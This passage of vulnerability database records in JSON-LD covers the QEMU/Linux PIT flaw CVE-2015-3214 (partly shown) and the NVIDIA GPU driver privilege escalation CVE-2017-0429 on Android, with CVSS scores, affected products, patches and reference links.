        "url": "https://www.exploit-db.com/exploits/37990/"
      },
      {
        "trust": 1.9,
        "url": "http://www.securityfocus.com/bid/75273"
      },
      {
        "trust": 1.9,
        "url": "https://security.gentoo.org/glsa/201510-02"
      },
      {
        "trust": 1.9,
        "url": "http://rhn.redhat.com/errata/rhsa-2015-1507.html"
      },
      {
        "trust": 1.9,
        "url": "http://rhn.redhat.com/errata/rhsa-2015-1508.html"
      },
      {
        "trust": 1.9,
        "url": "http://rhn.redhat.com/errata/rhsa-2015-1512.html"
      },
      {
        "trust": 1.8,
        "url": "http://www.securitytracker.com/id/1032598"
      },
      {
        "trust": 1.8,
        "url": "http://www.debian.org/security/2015/dsa-3348"
      },
      {
        "trust": 1.8,
        "url": "http://www.openwall.com/lists/oss-security/2015/06/25/7"
      },
      {
        "trust": 1.8,
        "url": "https://www.mail-archive.com/qemu-devel%40nongnu.org/msg304138.html"
      },
      {
        "trust": 1.8,
        "url": "http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=ee73f656a604d5aa9df86a97102e4e462dd79924"
      },
      {
        "trust": 1.8,
        "url": "http://mirror.linux.org.au/linux/kernel/v2.6/changelog-2.6.33"
      },
      {
        "trust": 1.8,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1229640"
      },
      {
        "trust": 1.8,
        "url": "https://github.com/torvalds/linux/commit/ee73f656a604d5aa9df86a97102e4e462dd79924"
      },
      {
        "trust": 1.8,
        "url": "https://support.lenovo.com/product_security/qemu"
      },
      {
        "trust": 1.8,
        "url": "https://support.lenovo.com/us/en/product_security/qemu"
      },
      {
        "trust": 1.8,
        "url": "https://www.arista.com/en/support/advisories-notices/security-advisories/1180-security-advisory-13"
      },
      {
        "trust": 1.0,
        "url": "https://access.redhat.com/security/cve/cve-2015-3214"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-3214"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-3214"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5154"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3214"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/errata/rhsa-2015:1507"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/errata/rhsa-2015:1508"
      },
      {
        "trust": 0.6,
        "url": "https://www.mail-archive.com/qemu-devel@nongnu.org/msg304138.html"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/errata/rhsa-2015:1512"
      },
      {
        "trust": 0.3,
        "url": "http://wiki.qemu.org/main_page"
      },
      {
        "trust": 0.3,
        "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.3,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2015-5154"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5158"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/119.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/2692-1/"
      },
      {
        "trust": 0.1,
        "url": "http://www.ubuntu.com/usn/usn-2692-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/qemu/1:2.2+dfsg-5expubuntu9.3"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/qemu/2.0.0+dfsg-2ubuntu1.15"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5745"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5225"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/faq"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5165"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-3214"
      },
      {
        "trust": 0.1,
        "url": "http://creativecommons.org/licenses/by-sa/2.5"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-5154"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3209"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-5158"
      },
      {
        "trust": 0.1,
        "url": "https://security.gentoo.org/"
      },
      {
        "trust": 0.1,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-3209"
      },
      {
        "trust": 0.1,
        "url": "https://bugs.gentoo.org."
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-81175"
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-3214"
      },
      {
        "db": "BID",
        "id": "75273"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-004512"
      },
      {
        "db": "PACKETSTORM",
        "id": "132839"
      },
      {
        "db": "PACKETSTORM",
        "id": "132859"
      },
      {
        "db": "PACKETSTORM",
        "id": "132838"
      },
      {
        "db": "PACKETSTORM",
        "id": "132855"
      },
      {
        "db": "PACKETSTORM",
        "id": "133422"
      },
      {
        "db": "PACKETSTORM",
        "id": "134165"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-3214"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201506-371"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-81175"
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-3214"
      },
      {
        "db": "BID",
        "id": "75273"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-004512"
      },
      {
        "db": "PACKETSTORM",
        "id": "132839"
      },
      {
        "db": "PACKETSTORM",
        "id": "132859"
      },
      {
        "db": "PACKETSTORM",
        "id": "132838"
      },
      {
        "db": "PACKETSTORM",
        "id": "132855"
      },
      {
        "db": "PACKETSTORM",
        "id": "133422"
      },
      {
        "db": "PACKETSTORM",
        "id": "134165"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-3214"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201506-371"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2015-08-31T00:00:00",
        "db": "VULHUB",
        "id": "VHN-81175"
      },
      {
        "date": "2015-08-31T00:00:00",
        "db": "VULMON",
        "id": "CVE-2015-3214"
      },
      {
        "date": "2015-06-17T00:00:00",
        "db": "BID",
        "id": "75273"
      },
      {
        "date": "2015-09-01T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2015-004512"
      },
      {
        "date": "2015-07-27T15:37:06",
        "db": "PACKETSTORM",
        "id": "132839"
      },
      {
        "date": "2015-07-29T01:13:01",
        "db": "PACKETSTORM",
        "id": "132859"
      },
      {
        "date": "2015-07-27T15:36:52",
        "db": "PACKETSTORM",
        "id": "132838"
      },
      {
        "date": "2015-07-29T00:57:08",
        "db": "PACKETSTORM",
        "id": "132855"
      },
      {
        "date": "2015-09-03T22:28:25",
        "db": "PACKETSTORM",
        "id": "133422"
      },
      {
        "date": "2015-11-02T16:49:11",
        "db": "PACKETSTORM",
        "id": "134165"
      },
      {
        "date": "2015-08-31T10:59:07.580000",
        "db": "NVD",
        "id": "CVE-2015-3214"
      },
      {
        "date": "2015-06-23T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201506-371"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2023-02-13T00:00:00",
        "db": "VULHUB",
        "id": "VHN-81175"
      },
      {
        "date": "2023-02-13T00:00:00",
        "db": "VULMON",
        "id": "CVE-2015-3214"
      },
      {
        "date": "2015-12-08T22:03:00",
        "db": "BID",
        "id": "75273"
      },
      {
        "date": "2015-09-01T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2015-004512"
      },
      {
        "date": "2023-02-13T00:48:24.553000",
        "db": "NVD",
        "id": "CVE-2015-3214"
      },
      {
        "date": "2023-04-10T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201506-371"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201506-371"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux Kernel and  QEMU of  i8254.c of  pit_ioport_read Host in  OS Vulnerabilities in arbitrary code execution",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-004512"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "buffer error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201506-371"
      }
    ],
    "trust": 0.6
  }
}

var-201702-0745
Vulnerability from variot

An elevation of privilege vulnerability in the NVIDIA GPU driver could enable a local malicious application to execute arbitrary code within the context of the kernel. This issue is rated as Critical due to the possibility of a local permanent device compromise, which may require reflashing the operating system to repair the device. Product: Android. Versions: Kernel-3.10. Android ID: A-32636619. References: N-CVE-2017-0429. GoogleNexus9 is a tablet from Google Inc. in the United States. NVIDIA GPUDrivers is a graphics processor driver. Google Nexus is prone to multiple privilege-escalation vulnerabilities. These issues are being tracked by Android Bug IDs A-32401526 and A-32636619

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201702-0745",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.8,
        "vendor": "linux",
        "version": "3.10"
      },
      {
        "model": "android",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "google",
        "version": "7.1.1"
      },
      {
        "model": "nexus",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "google",
        "version": "9"
      },
      {
        "model": "android",
        "scope": null,
        "trust": 0.8,
        "vendor": "google",
        "version": null
      },
      {
        "model": "android app fakeid",
        "scope": null,
        "trust": 0.6,
        "vendor": "google",
        "version": null
      },
      {
        "model": "android",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "google",
        "version": "7.1.1"
      },
      {
        "model": "android",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01588"
      },
      {
        "db": "BID",
        "id": "96070"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001503"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0429"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-304"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:google:android:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "7.1.1",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:3.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-0429"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Yuan-Tsung Lo, Tong Lin, Chiachih Wu ( @chiachih_wu), and Xuxian Jiang of C0RE Team and Xiaodong Wang.",
    "sources": [
      {
        "db": "BID",
        "id": "96070"
      }
    ],
    "trust": 0.3
  },
  "cve": "CVE-2017-0429",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 9.3,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 8.6,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": true,
            "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Medium",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 9.3,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2017-0429",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 9.3,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 8.6,
            "id": "CNVD-2017-01588",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.8,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "version": "3.0"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Local",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 7.8,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2017-0429",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "Required",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2017-0429",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2017-01588",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201702-304",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2017-0429",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01588"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0429"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001503"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0429"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-304"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "An elevation of privilege vulnerability in the NVIDIA GPU driver could enable a local malicious application to execute arbitrary code within the context of the kernel. This issue is rated as Critical due to the possibility of a local permanent device compromise, which may require reflashing the operating system to repair the device. Product: Android. Versions: Kernel-3.10. Android ID: A-32636619. References: N-CVE-2017-0429. GoogleNexus9 is a tablet from Google Inc. in the United States. NVIDIA GPUDrivers is a graphics processor driver. Google Nexus is prone to multiple privilege-escalation vulnerabilities. \nThese issues are being tracked by Android Bug IDs A-32401526 and A-32636619",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-0429"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001503"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-01588"
      },
      {
        "db": "BID",
        "id": "96070"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0429"
      }
    ],
    "trust": 2.52
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2017-0429",
        "trust": 3.4
      },
      {
        "db": "BID",
        "id": "96070",
        "trust": 2.6
      },
      {
        "db": "SECTRACK",
        "id": "1037798",
        "trust": 1.7
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001503",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-01588",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-304",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0429",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01588"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0429"
      },
      {
        "db": "BID",
        "id": "96070"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001503"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0429"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-304"
      }
    ]
  },
  "id": "VAR-201702-0745",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01588"
      }
    ],
    "trust": 0.06
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01588"
      }
    ]
  },
  "last_update_date": "2023-12-18T11:24:10.907000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Android Security Bulletin-February 2017",
        "trust": 0.8,
        "url": "https://source.android.com/security/bulletin/2017-02-01.html"
      },
      {
        "title": "Linux Kernel Archives",
        "trust": 0.8,
        "url": "http://www.kernel.org/"
      },
      {
        "title": "Patch for GoogleNexus NVIDIA GPUDriver Privilege Escalation Vulnerability (CNVD-2017-01588)",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/89446"
      },
      {
        "title": "Android NVIDIA GPU Fixes for driver permission and access control vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=67588"
      },
      {
        "title": "Android Security Bulletins: Android Security Bulletin\u2014February 2017",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=android_security_bulletins\u0026qid=861656f01e3e18209f39ad844e9ee35d"
      },
      {
        "title": "CVE-Study",
        "trust": 0.1,
        "url": "https://github.com/thdusdl1219/cve-study "
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01588"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0429"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001503"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-304"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-787",
        "trust": 1.0
      },
      {
        "problemtype": "CWE-264",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001503"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0429"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.4,
        "url": "http://www.securityfocus.com/bid/96070"
      },
      {
        "trust": 2.1,
        "url": "https://source.android.com/security/bulletin/2017-02-01.html"
      },
      {
        "trust": 1.7,
        "url": "http://www.securitytracker.com/id/1037798"
      },
      {
        "trust": 1.7,
        "url": "http://nvidia.custhelp.com/app/answers/detail/a_id/4561"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-0429"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2017-0429"
      },
      {
        "trust": 0.3,
        "url": "http://code.google.com/android/"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/787.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01588"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0429"
      },
      {
        "db": "BID",
        "id": "96070"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001503"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0429"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-304"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01588"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0429"
      },
      {
        "db": "BID",
        "id": "96070"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001503"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0429"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-304"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-02-20T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-01588"
      },
      {
        "date": "2017-02-08T00:00:00",
        "db": "VULMON",
        "id": "CVE-2017-0429"
      },
      {
        "date": "2017-02-06T00:00:00",
        "db": "BID",
        "id": "96070"
      },
      {
        "date": "2017-02-23T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-001503"
      },
      {
        "date": "2017-02-08T15:59:01.380000",
        "db": "NVD",
        "id": "CVE-2017-0429"
      },
      {
        "date": "2017-02-09T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201702-304"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-02-20T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-01588"
      },
      {
        "date": "2019-10-03T00:00:00",
        "db": "VULMON",
        "id": "CVE-2017-0429"
      },
      {
        "date": "2017-03-07T04:01:00",
        "db": "BID",
        "id": "96070"
      },
      {
        "date": "2017-02-23T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-001503"
      },
      {
        "date": "2019-10-03T00:03:26.223000",
        "db": "NVD",
        "id": "CVE-2017-0429"
      },
      {
        "date": "2019-10-23T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201702-304"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-304"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "NVIDIA GPU Vulnerability that could elevate privileges in drivers",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001503"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "buffer error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-304"
      }
    ],
    "trust": 0.6
  }
}

var-201702-0762
Vulnerability from variot

